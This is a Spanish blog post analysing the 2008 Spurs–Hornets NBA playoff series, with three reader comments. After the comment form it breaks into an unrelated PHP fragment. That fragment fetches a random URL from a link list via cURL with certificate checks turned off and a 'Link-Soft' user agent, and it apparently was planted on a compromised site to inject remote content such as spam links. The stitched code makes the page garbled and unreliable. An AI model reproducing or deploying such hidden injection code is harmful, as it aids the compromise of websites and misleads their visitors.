Análisis: San Antonio 4 – New Orleans 3

20 de May de 2008 por txusma

Hasta el final del rabo, todo es toro. Hace 2 semanas, los Spurs contemplaban, entre asombrados e incrédulos, como eran superados en 2 partidos consecutivos por unos jóvenes y correosos Hornets. Ellos, que habían barrido de la pista al doble MVP Steve Nash y al perro grande Shaquille O’Neal tenían que soportar como espectadores y analistas de todo el mundo les daban por muertos y enterrados después de las exhibiciones de Chris Paul y David West en el New Orleans Arena. Pero 15 días más tarde los que se retiran a los vestuarios entre abrazos y felicitaciones son los de siempre, los actuales campeones, los que poseen un auténtico Big Three que hace ya 6 años que dura.

En el análisis previo de la eliminatoria ya comentábamos que el particular cuento de hadas de los Hornets se había encontrado con su hermanastra perfecta. Igualmente apuntábamos algunos factores que declinarían el resultado hacia una y otra parte. Presagíamos una eliminatoria igualada y así ha sido. Chris Paul se ha confirmado como jugador imparable y destrozó a los Spurs en los 2 primeros partidos en los que los de Popovic se quedaron sin argumentos ante la energía y la calidad del joven base. Hacía 7 años que los Spurs no se veían con un 0-2 en contra y en aquella ocasión el resultado final fue desastroso para sus intereses. Esta vez y ante la suficiencia mostrada por New Orleans, los seguidores más faltos de confianza y fe recelaron de su equipo y se escondieron bajo las piedras.

Pero San Antonio volvió a casa, a su coto privado y las sensaciones cambiaron. Unos breves ajustes defensivos y la inclusión de Ginóbili en el quinteto titular cambiaron rápidamente la tornas. Los viejos rockeros devolvieron uno a uno los agravios y las humillaciones sufridas en los 2 primeros partidos y mudaron al barrio de enfrente las dudas. Chris Paul continuaba mayestático pero ahora ya no se trataba de pararlo sino de parar al resto y funcionó a la perfección. La eliminatoria volvía a New Orleans con empate técnico, pero pareciendo que San Antonio había encontrado la táctica perfecta. El problema fue que David West se salió del guión programado. Sus 38 puntos y 14 rebotes, más la increíble pájara de los Spurs del tercer cuarto volvió a devolver la confianza a los aficionados de los Hornets aunque ya nadie esperaba vencer en el Álamo en el sexto partido.

Tras una nueva victoria de los Spurs en casa, la eliminatoria vivía su momento álgido, su todo o nada particular. Y en esta clase de apuestas si hay que jugarse el dinero por algún equipo, aunque juegue fuera, aunque tenga que soportar la presión de más de 17.000 almas vestidas de blanco jaleando cualquier acción del rival y abucheando las suyas, se ha de jugar por los Spurs. Puede ser que los Hornets hayan sido mejores globalmente que los Spurs, pero estos han poseído la experiencia y el espíritu ganador necesarios para prevalecer por encima de sus rivales aún en lascircunstancias más adversas. Es lo que siempre se espera de ellos.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    No es por meterme el mocarro (bueno, un poco sí) pero acerté clavado el pronóstico de las dos eliminatorias 😀

      Citar

  2. Gallis dice:
    #2

    La de los Celtics, dices??? 🙂

    No recuerdo donde, si aquí o en el foro, comenté que sí los Spurs aguantaban el tercer cuarto, los Hornets mostrarían por fin esa inexperiencia de la que tanto hemos hablado. Y así fue. Tuvieron la oportunidad de remontar y se liaron a tirar triples sin sentido. Además, Paul se equivocó en varias entradas demasiado forzadas…

    Pero vaya, que todo equipo campeón tiene estas muescas en su debe. Les servirá para aprender, volver el año que viene…y llegar más lejos…

      Citar

  3. TheDeerHunter dice:
    #3

    Las del oeste decía…

    en las del este, digamos, me dispersé un poquillo 😉

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>